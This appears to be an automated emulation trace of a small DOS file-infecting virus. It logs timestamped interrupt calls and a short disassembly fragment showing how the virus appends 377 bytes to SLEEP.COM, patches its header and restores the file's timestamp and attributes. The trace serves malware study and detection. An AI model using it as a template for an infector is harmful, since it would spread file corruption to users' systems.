vx.netlux.org/Virus.DOS.Ahav.377

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:17:02.38220189Z 53 PC: 12a81 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:17:02.38361948Z 37 PC: 12a92 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:17:02.384675326Z 26 PC: 12aa5 | Set disk transfer address
2018-12-17T22:17:02.385589828Z 78 PC: 12ab0 | Find first file
2018-12-17T22:17:02.392067857Z 61 PC: 12abb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:17:02.396322751Z 63 PC: 12ac7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:17:02.402514347Z 62 PC: 12af5 | Close file
2018-12-17T22:17:02.40453942Z 67 PC: 12b01 | Get or set file attributes
2018-12-17T22:17:02.830418096Z 61 PC: 12b0a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:17:02.836989551Z 44 PC: 12b0f | Get time
0x12b0f: mov word ptr [bp + 0x229], dx
0x12b13: call 0x12b83
0x12b16: mov ax, 0x5700
0x12b19: mov dx, word ptr [bp + 0x12b]
0x12b1d: mov cx, word ptr [bp + 0x129]
0x12b21: inc ax
0x12b22: int 0x21
0x12b24: mov ah, 0x3e
0x12b26: int 0x21
0x12b28: mov ax, 0x4300
0x12b2b: lea dx, word ptr [bp + 0x297]
0x12b2f: xor cx, cx
0x12b31: inc ax
0x12b32: mov cl, byte ptr [bp + 0x128]
0x12b36: int 0x21
0x12b38: jmp 0x12b43
0x12b3a: mov ah, 0x3e
0x12b3c: int 0x21
0x12b3e: mov ah, 0x4f
0x12b40: jmp 0x12aae
2018-12-17T22:17:02.840315047Z 66 PC: 12b8f | Move file pointer
2018-12-17T22:17:02.84167901Z 64 PC: 12ba1 | Write file or device (Write 377 bytes on handle 5)
2018-12-17T22:17:02.84945574Z 66 PC: 12baa | Move file pointer
2018-12-17T22:17:02.850662073Z 64 PC: 12bb5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:17:02.857277505Z 87 PC: 12b24 | Get or set file date and time
2018-12-17T22:17:02.858606032Z 62 PC: 12b28 | Close file
2018-12-17T22:17:02.866411421Z 67 PC: 12b38 | Get or set file attributes
2018-12-17T22:17:02.875832024Z 26 PC: 12b4a | Set disk transfer address
2018-12-17T22:17:02.876800844Z 37 PC: 12b5b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')